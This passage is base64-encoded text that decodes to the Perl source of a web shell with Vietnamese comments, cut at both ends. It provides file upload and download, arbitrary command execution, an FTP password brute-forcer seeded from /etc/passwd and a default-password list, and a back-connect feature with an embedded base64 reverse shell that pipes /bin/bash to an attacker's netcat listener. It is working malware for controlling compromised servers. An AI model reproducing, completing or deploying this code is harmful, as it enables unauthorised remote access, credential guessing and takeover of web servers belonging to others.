2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnp